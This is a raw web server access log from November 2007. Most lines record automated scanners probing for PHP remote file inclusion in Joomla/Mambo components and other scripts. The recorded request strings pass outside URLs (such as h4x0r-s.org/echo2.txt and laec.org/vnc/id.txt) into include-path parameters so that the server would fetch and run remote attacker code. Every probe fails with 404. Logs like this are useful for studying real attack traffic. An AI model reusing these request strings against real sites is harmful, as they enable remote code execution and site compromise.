209.200.254.233 - - [18/Nov/2007:18:28:09 -0800] "GET //index.php?x=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.254.233 - - [18/Nov/2007:18:28:09 -0800] "GET /logs//index.php?x=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
158.251.4.149 - - [18/Nov/2007:18:29:01 -0800] "GET /logs/access_070820.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
87.119.200.212 - - [18/Nov/2007:18:29:34 -0800] "GET /logs/access_070820.log//akocomments.php?mosConfig_absolute_path=http://www.schmid-telecom.com/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.119.200.212 - - [18/Nov/2007:18:29:38 -0800] "GET /logs/access.log//akocomments.php?mosConfig_absolute_path=http://www.schmid-telecom.com/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
196.1.179.190 - - [18/Nov/2007:18:29:40 -0800] "GET /logs/access_070618.log HTTP/1.1" 200 274432 "http://search.yahoo.com/search?n=20&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=all&vm=p&fl=0&p=txt+%40YAHOO.COM+OR+%40aol.cm+OR+%40charter.net+OR+%40HOTMAIL.COM+OR+%40GMAIL.COM+%22%2B45%22" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
200.43.222.198 - - [18/Nov/2007:18:30:23 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.43.222.198 - - [18/Nov/2007:18:30:24 -0800] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.29.16.18 - - [18/Nov/2007:18:31:11 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.agungfebriawan.org/bos/code/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
72.29.16.18 - - [18/Nov/2007:18:31:11 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.agungfebriawan.org/bos/code/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
72.29.16.18 - - [18/Nov/2007:18:31:11 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.agungfebriawan.org/bos/code/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
72.29.16.18 - - [18/Nov/2007:18:31:12 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.agungfebriawan.org/bos/code/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.200.254.233 - - [18/Nov/2007:18:31:14 -0800] "GET /logs/access.log//index.php?x=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.216.195.2 - - [18/Nov/2007:18:31:20 -0800] "GET /logs/access_070820.log//index.php?pag=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.155.179.18 - - [18/Nov/2007:18:32:33 -0800] "GET /logs//index.php?configFile=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.155.179.18 - - [18/Nov/2007:18:32:33 -0800] "GET //index.php?configFile=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.43.222.198 - - [18/Nov/2007:18:34:32 -0800] "GET /logs/access_071008.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.43.222.198 - - [18/Nov/2007:18:34:34 -0800] "GET /logs/access_071028.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.254.233 - - [18/Nov/2007:18:34:48 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.254.233 - - [18/Nov/2007:18:34:49 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.254.233 - - [18/Nov/2007:18:35:14 -0800] "GET /logs/access_071105.log//components/com_performs/performs.php?mosConfig_absolute_path=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.254.233 - - [18/Nov/2007:18:35:14 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.254.233 - - [18/Nov/2007:18:35:14 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.254.226.234 - - [18/Nov/2007:18:35:33 -0800] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.43.222.198 - - [18/Nov/2007:18:36:05 -0800] "GET /logs/access_071014.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.254.226.234 - - [18/Nov/2007:18:36:52 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.7.117 - - [18/Nov/2007:18:37:54 -0800] "GET /cendoc/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:18:38:43 -0800] "GET /logs/index.php?pag=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
212.103.160.53 - - [18/Nov/2007:18:38:43 -0800] "GET /index.php?pag=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:18:38:44 -0800] "GET /logs/index.php?pag=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:18:38:44 -0800] "GET /index.php?pag=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.223.126.85 - - [18/Nov/2007:18:40:08 -0800] "GET /logs/access_071014.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://laec.org/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.223.126.85 - - [18/Nov/2007:18:40:08 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://laec.org/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.223.126.85 - - [18/Nov/2007:18:40:09 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://laec.org/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.223.126.85 - - [18/Nov/2007:18:40:20 -0800] "GET /logs/access.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://laec.org/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:18:41:12 -0800] "GET /logs/index.php?pag=http://www.wsteam.net/include.c?%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:18:41:12 -0800] "GET /index.php?pag=http://www.wsteam.net/include.c?%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.223.126.85 - - [18/Nov/2007:18:42:57 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://laec.org/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.223.126.85 - - [18/Nov/2007:18:42:57 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://laec.org/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.194.71.79 - - [18/Nov/2007:18:43:23 -0800] "GET /logs/index.php?pag=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.194.71.79 - - [18/Nov/2007:18:43:24 -0800] "GET /index.php?pag=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.223.126.85 - - [18/Nov/2007:18:46:00 -0800] "GET /logs/access_070716.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://laec.org/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.30.216.109 - - [18/Nov/2007:18:46:27 -0800] "GET /logs/access_071001.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.223.126.85 - - [18/Nov/2007:18:46:29 -0800] "GET /logs/access_071001.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://laec.org/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
166.70.169.66 - - [18/Nov/2007:18:46:37 -0800] "GET /logs/index.php?pag=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
166.70.169.66 - - [18/Nov/2007:18:46:37 -0800] "GET /index.php?pag=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.83.173.216 - - [18/Nov/2007:18:49:16 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.technoclub.eu/engine/templates/albums? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
145.253.239.90 - - [18/Nov/2007:18:50:02 -0800] "GET /logs/access_071015.log//index.php?open=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
145.253.239.90 - - [18/Nov/2007:18:50:02 -0800] "GET //index.php?open=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
145.253.239.90 - - [18/Nov/2007:18:50:03 -0800] "GET /logs//index.php?open=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.171.48.89 - - [18/Nov/2007:18:52:26 -0800] "GET /default.php?page=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
145.253.239.90 - - [18/Nov/2007:18:56:57 -0800] "GET /logs/access_070806.log//index.php?open=http://h4x0r-s.org/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.223.126.85 - - [18/Nov/2007:18:58:06 -0800] "GET /logs/access_070716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://laec.org/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.223.126.85 - - [18/Nov/2007:18:58:06 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://laec.org/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.223.126.85 - - [18/Nov/2007:18:58:06 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://laec.org/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.42.182 - - [18/Nov/2007:18:59:25 -0800] "GET /logs//ws/login.php?noSet=0&includedir=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.42.182 - - [18/Nov/2007:18:59:26 -0800] "GET //ws/login.php?noSet=0&includedir=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.200.254.233 - - [18/Nov/2007:19:00:45 -0800] "GET /logs/access_070716.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
81.223.126.85 - - [18/Nov/2007:19:02:14 -0800] "GET /logs/access_070820.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://laec.org/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.233.63.186 - - [18/Nov/2007:19:03:00 -0800] "GET /logs/access_070709.log//modules/My_eGallery/public/displayCategory.php?basepath=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.63.186 - - [18/Nov/2007:19:03:01 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.63.186 - - [18/Nov/2007:19:03:01 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.22.170 - - [18/Nov/2007:19:03:29 -0800] "GET /logs/access_070723.log HTTP/1.0" 200 1048576 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:04:01 -0800] "GET /logs//pub08_comments.php?basePath=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:04:02 -0800] "GET //pub08_comments.php?basePath=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.43.222.198 - - [18/Nov/2007:19:05:00 -0800] "GET /logs/access_070910.log//modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.43.222.198 - - [18/Nov/2007:19:05:01 -0800] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:06:29 -0800] "GET /logs/access_071105.log//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:06:29 -0800] "GET /logs/access_071105.log//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:06:30 -0800] "GET //pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:06:30 -0800] "GET //pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:06:30 -0800] "GET /logs//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
212.103.160.53 - - [18/Nov/2007:19:06:30 -0800] "GET /logs//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:07:13 -0800] "GET /logs//login.php?includedir=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:07:13 -0800] "GET //login.php?includedir=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:07:26 -0800] "GET /logs/access.log//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:07:26 -0800] "GET /logs/access.log//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.254.233 - - [18/Nov/2007:19:08:54 -0800] "GET /logs/access_070820.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:12:40 -0800] "GET /logs/access_071105.log//pub08_comments.php?basePath=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.9.5 - - [18/Nov/2007:19:13:46 -0800] "GET /logs/access.log//pub08_comments.php?basePath=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
145.253.239.90 - - [18/Nov/2007:19:15:23 -0800] "GET /index.php?pagina=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.1.121 - - [18/Nov/2007:19:16:12 -0800] "GET /logs//modify.php?dir_module=http://www.aifam.com/Rochester/.../.scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.1.121 - - [18/Nov/2007:19:16:13 -0800] "GET //modify.php?dir_module=http://www.aifam.com/Rochester/.../.scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.233.63.186 - - [18/Nov/2007:19:16:24 -0800] "GET /logs/access_070611.log//modules/My_eGallery/public/displayCategory.php?basepath=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
68.51.206.199 - - [18/Nov/2007:19:17:00 -0800] "GET /labia/ HTTP/1.1" 200 524 "http://www.google.com/search?q=labia&hl=en&rlz=1T4ADBF_enUS249&start=150&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
88.131.153.91 - - [18/Nov/2007:19:17:37 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.153.91 - - [18/Nov/2007:19:17:38 -0800] "GET / HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
211.233.63.186 - - [18/Nov/2007:19:18:30 -0800] "GET /logs/access_071014.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.63.186 - - [18/Nov/2007:19:18:30 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.63.186 - - [18/Nov/2007:19:18:31 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
68.180.250.112 - - [18/Nov/2007:19:19:18 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.22.170 - - [18/Nov/2007:19:21:50 -0800] "GET /logs/access_071029.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
83.3.226.2 - - [18/Nov/2007:19:22:28 -0800] "GET /logs//doeditconfig.php?thispath=../includes&config[path]=http://www.aifam.com/Rochester/.../.scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.3.226.2 - - [18/Nov/2007:19:22:29 -0800] "GET //doeditconfig.php?thispath=../includes&config[path]=http://www.aifam.com/Rochester/.../.scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.233.80.78 - - [18/Nov/2007:19:23:09 -0800] "GET /logs/access_071014.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.233.80.78 - - [18/Nov/2007:19:23:09 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.233.80.78 - - [18/Nov/2007:19:23:10 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:23:17 -0800] "GET /logs/access_071028.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:23:17 -0800] "GET /logs/access_071028.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:23:18 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:23:18 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:23:18 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
212.103.160.53 - - [18/Nov/2007:19:23:18 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.233.63.186 - - [18/Nov/2007:19:23:37 -0800] "GET /logs/access_070709.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dark4ngel.iespana.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.106.1.121 - - [18/Nov/2007:19:24:19 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.aifam.com/Rochester/.../.scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.103.160.53 - - [18/Nov/2007:19:26:03 -0800] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [18/Nov/2007:19:26:03 -0800] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
145.253.239.90 - - [18/Nov/2007:19:26:16 -0800] "GET /logs/access_070723.log/index.php?pagina=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
145.253.239.90 - - [18/Nov/2007:19:26:17 -0800] "GET /logs/index.php?pagina=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.22.170 - - [18/Nov/2007:19:29:15 -0800] "GET /logs/access_070813.log HTTP/1.0" 200 983040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:29:41 -0800] "GET /logs/access_071105.log//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:29:42 -0800] "GET //pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
67.18.218.34 - - [18/Nov/2007:19:29:42 -0800] "GET /logs//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:29:42 -0800] "GET /logs/access_071105.log//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:29:43 -0800] "GET //pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:19:29:44 -0800] "GET /logs//pub08_comments.php?basePath=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
